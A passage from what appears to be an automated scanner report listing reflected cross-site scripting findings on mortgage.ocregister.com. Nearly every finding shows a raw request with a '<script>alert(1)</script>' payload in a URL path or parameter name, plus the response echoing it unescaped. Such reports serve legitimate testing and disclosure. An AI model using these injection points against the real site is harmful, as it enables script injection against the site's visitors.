Content-Length: 62653

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/01d9d7d\"><script>alert(1)</script>ca8ccf11586/feed/" />
...[SNIP]...

1.320. http://mortgage.ocregister.com/2010/01/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/01/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fc50"><script>alert(1)</script>ec9310bc127 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6fc50\"><script>alert(1)</script>ec9310bc127 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/01/?6fc50"><script>alert(1)</script>ec9310bc127=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 106635

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2010 January - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/01/?6fc50\"><script>alert(1)</script>ec9310bc127=1feed/" />
...[SNIP]...

1.321. http://mortgage.ocregister.com/2010/02/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/02/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 712e3"><script>alert(1)</script>9e5b2bfe9ed was submitted in the REST URL parameter 1. This input was echoed as 712e3\"><script>alert(1)</script>9e5b2bfe9ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010712e3"><script>alert(1)</script>9e5b2bfe9ed/02/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:55 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62653

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010712e3\"><script>alert(1)</script>9e5b2bfe9ed/02/feed/" />
...[SNIP]...

1.322. http://mortgage.ocregister.com/2010/02/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/02/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b385"><script>alert(1)</script>122a8b5d193 was submitted in the REST URL parameter 2. This input was echoed as 7b385\"><script>alert(1)</script>122a8b5d193 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/027b385"><script>alert(1)</script>122a8b5d193/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:59 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62652

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/027b385\"><script>alert(1)</script>122a8b5d193/feed/" />
...[SNIP]...

1.323. http://mortgage.ocregister.com/2010/02/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/02/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6efb2"><script>alert(1)</script>1b95ace2821 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6efb2\"><script>alert(1)</script>1b95ace2821 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/02/?6efb2"><script>alert(1)</script>1b95ace2821=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96136

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2010 February - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/02/?6efb2\"><script>alert(1)</script>1b95ace2821=1feed/" />
...[SNIP]...

1.324. http://mortgage.ocregister.com/2010/03/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/03/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2292"><script>alert(1)</script>bcdb1fec87 was submitted in the REST URL parameter 1. This input was echoed as f2292\"><script>alert(1)</script>bcdb1fec87 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010f2292"><script>alert(1)</script>bcdb1fec87/03/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:53 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62653

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010f2292\"><script>alert(1)</script>bcdb1fec87/03/feed/" />
...[SNIP]...

1.325. http://mortgage.ocregister.com/2010/03/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/03/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 310bd"><script>alert(1)</script>7a47a846288 was submitted in the REST URL parameter 2. This input was echoed as 310bd\"><script>alert(1)</script>7a47a846288 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/03310bd"><script>alert(1)</script>7a47a846288/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:57 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/03310bd\"><script>alert(1)</script>7a47a846288/feed/" />
...[SNIP]...

1.326. http://mortgage.ocregister.com/2010/03/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/03/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6768b"><script>alert(1)</script>54bb9743afd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6768b\"><script>alert(1)</script>54bb9743afd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/03/?6768b"><script>alert(1)</script>54bb9743afd=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96876

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2010 March - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/03/?6768b\"><script>alert(1)</script>54bb9743afd=1feed/" />
...[SNIP]...

1.327. http://mortgage.ocregister.com/2010/04/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/04/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ca09"><script>alert(1)</script>d2b6ccdfeec was submitted in the REST URL parameter 1. This input was echoed as 4ca09\"><script>alert(1)</script>d2b6ccdfeec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /20104ca09"><script>alert(1)</script>d2b6ccdfeec/04/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:43 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62652

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20104ca09\"><script>alert(1)</script>d2b6ccdfeec/04/feed/" />
...[SNIP]...

1.328. http://mortgage.ocregister.com/2010/04/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/04/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e7ae"><script>alert(1)</script>1e9af29e281 was submitted in the REST URL parameter 2. This input was echoed as 2e7ae\"><script>alert(1)</script>1e9af29e281 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/042e7ae"><script>alert(1)</script>1e9af29e281/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:47 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62652

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/042e7ae\"><script>alert(1)</script>1e9af29e281/feed/" />
...[SNIP]...

1.329. http://mortgage.ocregister.com/2010/04/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/04/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 554c6"><script>alert(1)</script>0a80980ac2b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 554c6\"><script>alert(1)</script>0a80980ac2b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/04/?554c6"><script>alert(1)</script>0a80980ac2b=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96995

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2010 April - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/04/?554c6\"><script>alert(1)</script>0a80980ac2b=1feed/" />
...[SNIP]...

1.330. http://mortgage.ocregister.com/2010/05/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/05/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7b94"><script>alert(1)</script>a62b666be76 was submitted in the REST URL parameter 1. This input was echoed as e7b94\"><script>alert(1)</script>a62b666be76 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010e7b94"><script>alert(1)</script>a62b666be76/05/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:40 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010e7b94\"><script>alert(1)</script>a62b666be76/05/feed/" />
...[SNIP]...

1.331. http://mortgage.ocregister.com/2010/05/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/05/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bedbd"><script>alert(1)</script>11ff887daaf was submitted in the REST URL parameter 2. This input was echoed as bedbd\"><script>alert(1)</script>11ff887daaf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/05bedbd"><script>alert(1)</script>11ff887daaf/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:44 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/05bedbd\"><script>alert(1)</script>11ff887daaf/feed/" />
...[SNIP]...

1.332. http://mortgage.ocregister.com/2010/05/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/05/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0f28"><script>alert(1)</script>8593dcd5118 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b0f28\"><script>alert(1)</script>8593dcd5118 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/05/?b0f28"><script>alert(1)</script>8593dcd5118=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98765

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2010 May - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/05/?b0f28\"><script>alert(1)</script>8593dcd5118=1feed/" />
...[SNIP]...

1.333. http://mortgage.ocregister.com/2010/06/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/06/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a080d"><script>alert(1)</script>c86de3d6ec3 was submitted in the REST URL parameter 1. This input was echoed as a080d\"><script>alert(1)</script>c86de3d6ec3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010a080d"><script>alert(1)</script>c86de3d6ec3/06/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:41 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010a080d\"><script>alert(1)</script>c86de3d6ec3/06/feed/" />
...[SNIP]...

1.334. http://mortgage.ocregister.com/2010/06/ [REST URL parameter 2]

Summary

